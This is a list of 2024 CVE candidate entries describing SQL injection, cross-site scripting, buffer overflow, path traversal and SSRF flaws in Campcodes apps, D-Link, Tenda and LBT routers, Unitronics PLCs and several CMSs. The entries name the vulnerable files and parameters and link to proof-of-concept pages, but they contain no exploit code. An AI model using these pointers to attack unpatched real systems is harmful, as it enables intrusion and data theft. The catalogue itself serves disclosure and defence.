CVE 2024 2780 Candidate A vulnerability was found in Campcodes Online Marriage Registration System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257614 is the identifier assigned to this vulnerability. MISC:VDB-257614 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257614 | MISC:VDB-257614 | Campcodes Online Marriage Registration System admin-profile.php cross site scripting | URL:https://vuldb.com/?id.257614 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%205.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%205.pdf Assigned (20240321)
CVE 2024 2779 Candidate A vulnerability was found in Campcodes Online Marriage Registration System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/application-bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257613 was assigned to this vulnerability. MISC:VDB-257613 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257613 | MISC:VDB-257613 | Campcodes Online Marriage Registration System application-bwdates-reports-details.php cross site scripting | URL:https://vuldb.com/?id.257613 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%204.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%204.pdf Assigned (20240321)
CVE 2024 2778 Candidate A vulnerability was found in Campcodes Online Marriage Registration System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257612. MISC:VDB-257612 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257612 | MISC:VDB-257612 | Campcodes Online Marriage Registration System search.php cross site scripting | URL:https://vuldb.com/?id.257612 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%203.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%203.pdf Assigned (20240321)
CVE 2024 27774 Candidate Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-259: Use of Hard-coded Password may allow disclosing Sensitive Information Embedded inside Device's Firmware MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 | URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 Assigned (20240226)
CVE 2024 27773 Candidate Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-348: Use of Less Trusted Source may allow RCE MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 | URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 Assigned (20240226)
CVE 2024 27772 Candidate Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-78: 'OS Command Injection' may allow RCE MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 | URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 Assigned (20240226)
CVE 2024 27771 Candidate Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-22: 'Path Traversal' may allow RCE MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 | URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 Assigned (20240226)
CVE 2024 27770 Candidate Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-23: Relative Path Traversal MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 | URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 Assigned (20240226)
CVE 2024 2777 Candidate A vulnerability has been found in Campcodes Online Marriage Registration System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/application-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257611. MISC:VDB-257611 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257611 | MISC:VDB-257611 | Campcodes Online Marriage Registration System application-bwdates-reports-details.php sql injection | URL:https://vuldb.com/?id.257611 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%202.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%202.pdf Assigned (20240321)
CVE 2024 27769 Candidate Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor may allow Taking Ownership Over Devices MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered | MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 | URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 Assigned (20240226)
CVE 2024 27767 Candidate CWE-287: Improper Authentication may allow Authentication Bypass MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 | URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 Assigned (20240226)
CVE 2024 27765 Candidate Directory Traversal vulnerability in Jeewms v.3.7 and before allows a remote attacker to obtain sensitive information via the cgformTemplateController component. MISC:https://gitee.com/erzhongxmu/JEEWMS/issues/I8YN90 Assigned (20240226)
CVE 2024 27764 Candidate An issue in Jeewms v.3.7 and before allows a remote attacker to escalate privileges via the AuthInterceptor component. MISC:https://gitee.com/erzhongxmu/JEEWMS/issues/I8YN90 Assigned (20240226)
CVE 2024 2776 Candidate A vulnerability, which was classified as critical, was found in Campcodes Online Marriage Registration System 1.0. Affected is an unknown function of the file /admin/search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257610 is the identifier assigned to this vulnerability. MISC:VDB-257610 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257610 | MISC:VDB-257610 | Campcodes Online Marriage Registration System search.php sql injection | URL:https://vuldb.com/?id.257610 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%201.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%201.pdf Assigned (20240321)
CVE 2024 27758 Candidate In RPyC before 6.0.0, when a server exposes a method that calls the attribute named __array__ for a client-provided netref (e.g., np.array(client_netref)), a remote attacker can craft a class that results in remote code execution. MISC:https://gist.github.com/renbou/957f70d27470982994f12a1d70153d09 | MISC:https://github.com/tomerfiliba-org/rpyc/security/advisories/GHSA-h5cg-53g7-gqjw Assigned (20240226)
CVE 2024 27757 Candidate flusity CMS through 2.45 allows tools/addons_model.php Gallery Name XSS. The reporter indicates that this product "ceased its development as of February 2024." MISC:https://github.com/jubilianite/flusity-CMS/security/advisories/GHSA-5843-5m74-7fqh Assigned (20240226)
CVE 2024 27756 Candidate An issue in GLPI v.10.0.12 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted script to the title field. MISC:https://medium.com/@cristiansindile/formula-injection-in-glpi-cve-2024-27756-3649c7cca092 Assigned (20240226)
CVE 2024 2775 Candidate A vulnerability, which was classified as problematic, has been found in Campcodes Online Marriage Registration System 1.0. This issue affects some unknown processing of the file /user/user-profile.php. The manipulation of the argument lname leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257609 was assigned to this vulnerability. MISC:VDB-257609 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257609 | MISC:VDB-257609 | Campcodes Online Marriage Registration System user-profile.php cross site scripting | URL:https://vuldb.com/?id.257609 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%202.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%202.pdf Assigned (20240321)
CVE 2024 27747 Candidate File Upload vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email Image parameter in the profile.php component. MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md Assigned (20240226)
CVE 2024 27746 Candidate SQL Injection vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email address parameter in the index.php component. MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.md Assigned (20240226)
CVE 2024 27744 Candidate Cross Site Scripting vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component. MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md Assigned (20240226)
CVE 2024 27743 Candidate Cross Site Scripting vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the Address parameter in the add_invoices.php component. MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.md Assigned (20240226)
CVE 2024 2774 Candidate A vulnerability classified as critical was found in Campcodes Online Marriage Registration System 1.0. This vulnerability affects unknown code of the file /user/search.php. The manipulation of the argument searchdata leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257608. MISC:VDB-257608 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257608 | MISC:VDB-257608 | Campcodes Online Marriage Registration System search.php sql injection | URL:https://vuldb.com/?id.257608 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%201.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%201.pdf Assigned (20240321)
CVE 2024 27734 Candidate A Cross Site Scripting vulnerability in CSZ CMS v.1.3.0 allows an attacker to execute arbitrary code via a crafted script to the Site Name fields of the Site Settings component. MISC:https://github.com/sms2056/cms/blob/main/3.md Assigned (20240226)
CVE 2024 27733 Candidate File Upload vulnerability in Byzro Network Smart s42 Management Platform v.S42 allows a local attacker to execute arbitrary code via the useratte/userattestation.php component. MISC:https://github.com/Sadw11v/cve/blob/main/upload.md Assigned (20240226)
CVE 2024 2773 Candidate A vulnerability classified as problematic has been found in Campcodes Online Marriage Registration System 1.0. This affects an unknown part of the file /user/search.php. The manipulation of the argument searchdata leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257607. MISC:VDB-257607 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257607 | MISC:VDB-257607 | Campcodes Online Marriage Registration System search.php cross site scripting | URL:https://vuldb.com/?id.257607 | MISC:https://github.com/Kurunie/vuln_report/blob/main/Complete%20Online%20Marriage%20Registration%20System's%20vuln.pdf | URL:https://github.com/Kurunie/vuln_report/blob/main/Complete%20Online%20Marriage%20Registration%20System's%20vuln.pdf Assigned (20240321)
CVE 2024 27718 Candidate SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component. MISC:https://github.com/tldjgggg/cve/blob/main/sql.md Assigned (20240226)
CVE 2024 27707 Candidate Server Side Request Forgery (SSRF) vulnerability in hcengineering Huly Platform v.0.6.202 allows attackers to run arbitrary code via upload of crafted SVG file. MISC:https://github.com/b-hermes/vulnerability-research/tree/main/CVE-2024-27707 Assigned (20240226)
CVE 2024 27703 Candidate Cross Site Scripting vulnerability in Leantime 3.0.6 allows a remote attacker to execute arbitrary code via the to-do title parameter. MISC:https://github.com/b-hermes/vulnerability-research/blob/main/CVE-2024-27703/README.md Assigned (20240226)
CVE 2024 2770 Candidate A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/contact-us.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257606 is the identifier assigned to this vulnerability. MISC:VDB-257606 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257606 | MISC:VDB-257606 | Campcodes Complete Online Beauty Parlor Management System contact-us.php sql injection | URL:https://vuldb.com/?id.257606 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%204.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%204.pdf Assigned (20240321)
CVE 2024 27698 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. Assigned (20240226)
CVE 2024 27694 Candidate FlyCms v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the /system/share/ztree_category_edit. MISC:https://github.com/sms2056/cms/blob/main/1.md Assigned (20240226)
CVE 2024 27692 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-22939. Reason: This candidate is a duplicate of CVE-2024-22939. Notes: All CVE users should reference CVE-2024-22939 instead of this candidate. Assigned (20240226)
CVE 2024 2769 Candidate A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257605 was assigned to this vulnerability. MISC:VDB-257605 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257605 | MISC:VDB-257605 | Campcodes Complete Online Beauty Parlor Management System admin-profile.php sql injection | URL:https://vuldb.com/?id.257605 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%205.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%205.pdf Assigned (20240321)
CVE 2024 27689 Candidate Stupid Simple CMS v1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via /update-article.php. MISC:https://github.com/Xin246/cms/blob/main/2.md Assigned (20240226)
CVE 2024 27684 Candidate A Cross-site scripting (XSS) vulnerability in dlapn.cgi, dldongle.cgi, dlcfg.cgi, fwup.cgi and seama.cgi in D-Link GORTAC750_A1_FW_v101b03 allows remote attackers to inject arbitrary web script or HTML via the url parameter. MISC:https://drive.google.com/file/d/1qu4iBQGeAwolTXjVOTXsAAusSHo2ie-Y/view | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240226)
CVE 2024 27683 Candidate D-Link Go-RT-AC750 GORTAC750_A1_FW_v101b03 contains a stack-based buffer overflow via the function hnap_main. An attacker can send a POST request to trigger the vulnerablilify. MISC:https://drive.google.com/file/d/18RhbBnaD_kH16Y6C-7TpSSPUmYKKyU_k/view | MISC:https://gist.github.com/sunwithmoon/428c3871482a600382fec0a1994a518b | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240226)
CVE 2024 27680 Candidate Flusity-CMS v2.33 is vulnerable to Cross Site Scripting (XSS) in the "Contact form." MISC:https://github.com/xiaolanjing0/cms/blob/main/4.md Assigned (20240226)
CVE 2024 2768 Candidate A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/edit-services.php. The manipulation of the argument editid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257604. MISC:VDB-257604 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257604 | MISC:VDB-257604 | Campcodes Complete Online Beauty Parlor Management System edit-services.php sql injection | URL:https://vuldb.com/?id.257604 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%203.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%203.pdf Assigned (20240321)
CVE 2024 2767 Candidate A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/forgot-password.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257603. MISC:VDB-257603 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257603 | MISC:VDB-257603 | Campcodes Complete Online Beauty Parlor Management System forgot-password.php sql injection | URL:https://vuldb.com/?id.257603 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%202.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%202.pdf Assigned (20240321)
CVE 2024 27668 Candidate Flusity-CMS v2.33 is affected by: Cross Site Scripting (XSS) in 'Custom Blocks.' MISC:https://github.com/LY102483/cms/blob/main/1.md Assigned (20240226)
CVE 2024 27662 Candidate D-Link DIR-823G A1V1.0.2B05 was discovered to contain a Null-pointer dereferences in sub_4110f4(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x4116F0-5befc4a65457482c8c4dcb16910ab820?pvs=4 Assigned (20240226)
CVE 2024 27661 Candidate D-Link DIR-823G A1V1.0.2B05 was discovered to contain Null-pointer dereferences in sub_4484A8(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x42444C-34458f12482346b291f334eea12e6fd0?pvs=4 Assigned (20240226)
CVE 2024 27660 Candidate D-Link DIR-823G A1V1.0.2B05 was discovered to contain a Null-pointer dereferences in sub_41C488(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x41C708-e46f864c48114f45894f4563588d7968?pvs=4 Assigned (20240226)
CVE 2024 2766 Candidate A vulnerability has been found in Campcodes Complete Online Beauty Parlor Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257602 is the identifier assigned to this vulnerability. MISC:VDB-257602 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257602 | MISC:VDB-257602 | Campcodes Complete Online Beauty Parlor Management System index.php sql injection | URL:https://vuldb.com/?id.257602 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%201.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%201.pdf Assigned (20240321)
CVE 2024 27659 Candidate D-Link DIR-823G A1V1.0.2B05 was discovered to contain Null-pointer dereferences in sub_42AF30(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x42B4C4-dfeae31d711f414796e1d9eb9cea7d31?pvs=4 Assigned (20240226)
CVE 2024 27657 Candidate D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the User-Agent parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input, and possibly remote code execution. MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-OOBW-0x41D5B0-462500887ea3464692e3e697cc43838c?pvs=4 Assigned (20240226)
CVE 2024 27656 Candidate D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the Cookie parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input, and possibly remote code execution. MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-OOBW-0x41E2A0-8ea57277c7cd4ea18dbc40bcb41a98f2?pvs=4 Assigned (20240226)
CVE 2024 27655 Candidate D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the SOAPACTION parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input, and possibly remote code execution. MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-OOBW-0x41E094-f1bd478368644136ad2e3a33e59041b2?pvs=4 Assigned (20240226)
CVE 2024 2764 Candidate A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.48. This affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument endIP leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257601 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257601 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257601 | MISC:VDB-257601 | Tenda AC10U SetPptpServerCfg formSetPPTPServer stack-based overflow | URL:https://vuldb.com/?id.257601 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetPPTPServer.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetPPTPServer.md Assigned (20240321)
CVE 2024 2763 Candidate A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.48. Affected by this issue is the function formSetCfm of the file goform/setcfm. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257600. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257600 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257600 | MISC:VDB-257600 | Tenda AC10U setcfm formSetCfm stack-based overflow | URL:https://vuldb.com/?id.257600 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetCfm.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetCfm.md Assigned (20240321)
CVE 2024 27627 Candidate A reflected cross-site scripting (XSS) vulnerability exists in SuperCali version 1.1.0, allowing remote attackers to execute arbitrary JavaScript code via the email parameter in the bad_password.php page. MISC:https://packetstormsecurity.com/files/177254/SuperCali-1.1.0-Cross-Site-Scripting.html Assigned (20240226)
CVE 2024 27626 Candidate A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in Dotclear version 2.29. The flaw exists within the Search functionality of the Admin Panel. MISC:https://packetstormsecurity.com/files/177239/Dotclear-2.29-Cross-Site-Scripting.html Assigned (20240226)
CVE 2024 27625 Candidate CMS Made Simple Version 2.2.19 is vulnerable to Cross Site Scripting (XSS). This vulnerability resides in the File Manager module of the admin panel. Specifically, the issue arises due to inadequate sanitization of user input in the "New directory" field. MISC:https://packetstormsecurity.com/files/177243/CMS-Made-Simple-2.2.19-Cross-Site-Scripting.html Assigned (20240226)
CVE 2024 27623 Candidate CMS Made Simple version 2.2.19 is vulnerable to Server-Side Template Injection (SSTI). The vulnerability exists within the Design Manager, particularly when editing the Breadcrumbs. MISC:https://github.com/capture0x/CMSMadeSimple2 Assigned (20240226)
CVE 2024 27622 Candidate A remote code execution vulnerability has been identified in the User Defined Tags module of CMS Made Simple version 2.2.19. This vulnerability arises from inadequate sanitization of user-supplied input in the 'Code' section of the module. As a result, authenticated users with administrative privileges can inject and execute arbitrary PHP code. MISC:https://github.com/capture0x/CMSMadeSimple/ Assigned (20240226)
CVE 2024 27613 Candidate Numbas editor before 7.3 mishandles reading of themes and extensions. MISC:https://github.com/numbas/Numbas | MISC:https://www.numbas.org.uk/blog/2024/03/development-update-march-2024/ Assigned (20240226)
CVE 2024 27612 Candidate Numbas editor before 7.3 mishandles editing of themes and extensions. MISC:https://github.com/numbas/Numbas | MISC:https://www.numbas.org.uk/blog/2024/03/development-update-march-2024/ Assigned (20240226)
CVE 2024 27572 Candidate LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the updateCurAPlist function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/updateCurAPlist.md Assigned (20240226)
CVE 2024 27571 Candidate LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the makeCurRemoteApList function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/makeCurRemoteApList.md Assigned (20240226)
CVE 2024 27570 Candidate LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the generate_conf_router function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/generate_conf_router.md Assigned (20240226)
CVE 2024 27569 Candidate LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the ApCliSsid parameter in the init_nvram function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/init_nvram.md Assigned (20240226)
CVE 2024 27568 Candidate LBT T300-T390 v2.2.1.8 were discovered to contain a stack overflow via the apn_name_3g parameter in the setupEC20Apn function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/setupEC20Apn.md Assigned (20240226)
CVE 2024 27567 Candidate LBT T300- T390 v2.2.1.8 were discovered to contain a stack overflow via the vpn_client_ip parameter in the config_vpn_pptp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. MISC:https://github.com/cvdyfbwa/IoT_LBT_Router/blob/main/config_vpn_pptp.md Assigned (20240226)
CVE 2024 27565 Candidate A Server-Side Request Forgery (SSRF) in weixin.php of ChatGPT-wechat-personal commit a0857f6 allows attackers to force the application to make arbitrary requests. MISC:https://github.com/dirk1983/chatgpt-wechat-personal/issues/4 Assigned (20240226)
CVE 2024 27564 Candidate A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter. MISC:https://github.com/dirk1983/chatgpt/issues/114 Assigned (20240226)
CVE 2024 27563 Candidate A Server-Side Request Forgery (SSRF) in the getFileFromRepo function of WonderCMS v3.1.3 allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the pluginThemeUrl parameter. MISC:https://github.com/zer0yu/CVE_Request/blob/master/WonderCMS/wondercms_pluginThemeUrl.md Assigned (20240226)
